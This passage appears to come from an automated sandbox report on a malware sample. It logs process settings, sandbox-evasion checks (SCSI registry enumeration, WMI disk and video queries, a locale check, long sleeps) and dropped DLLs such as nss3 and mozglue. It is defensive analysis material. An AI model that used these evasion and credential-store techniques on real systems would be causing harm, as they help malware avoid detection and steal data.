                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_1-95166
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID=&quot;Disk #0, Partition #1&quot;} where resultclass = Win32_DiskDrive
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = &apos;C:&apos;
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID=&quot;C:&quot;} where resultclass = Win32_DiskPartition
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent=&quot;Win32_LogicalDisk.DeviceID=\&quot;C:\&quot;&quot;
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeMemory allocated: 173F2300000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeMemory allocated: 173F3D00000 memory reserve | memory write watch
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 16B0000 memory reserve | memory write watch
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3110000 memory reserve | memory write watch
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2EC0000 memory reserve | memory write watch
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1510000 memory reserve | memory write watch
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3270000 memory reserve | memory write watch
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 3070000 memory reserve | memory write watch
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWindow / User API: threadDelayed 3219
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWindow / User API: threadDelayed 6402
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4818
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 4936
                                Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exeWindow / User API: threadDelayed 4676
                                Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exeWindow / User API: threadDelayed 5322
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-39238
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\relay.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
                                Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cqecfsbeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
                                Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdgJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u42w.2\relay.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u42w.2\UIxMarketPlugin.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeAPI coverage: 5.1 %
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeAPI coverage: 1.7 %
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 1528Thread sleep time: -23058430092136925s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe TID: 7232Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -31359464925306218s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -51305s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -60000s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -59844s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -59735s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -32253s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -59610s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -34891s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -59463s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -59321s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -59201s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -48913s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -59087s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -40210s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -58976s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -50915s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -58860s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -58734s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -58611s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -58497s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -58387s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -58275s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -47902s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -58163s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -39526s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -58051s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -57941s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -56661s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -57829s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -49766s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -57718s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -35830s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -57606s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -57493s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -43265s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -57381s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -55387s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -57267s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -40637s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -57117s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -31819s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -56992s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -49549s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -56887s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -56766s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -56328s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -56547s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -46596s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -56393s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -56259s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -32008s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -56151s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -38067s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -56042s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -55924s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -31695s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -55817s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -34264s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -55636s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -34058s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -58670s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -55529s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -55400s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -55295s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -31647s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -55183s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -55071s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -54945s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -51976s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -54832s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -34549s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -45915s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -54719s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -54609s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -55255s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -54498s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -54387s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -33199s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -54275s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -54163s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -54052s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -43277s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -47778s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -53939s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -53822s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -53716s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8068Thread sleep time: -53604s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7892Thread sleep time: -38506s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe TID: 8132Thread sleep count: 4676 > 30
                                Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe TID: 8132Thread sleep time: -3324636s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe TID: 8132Thread sleep count: 5322 > 30
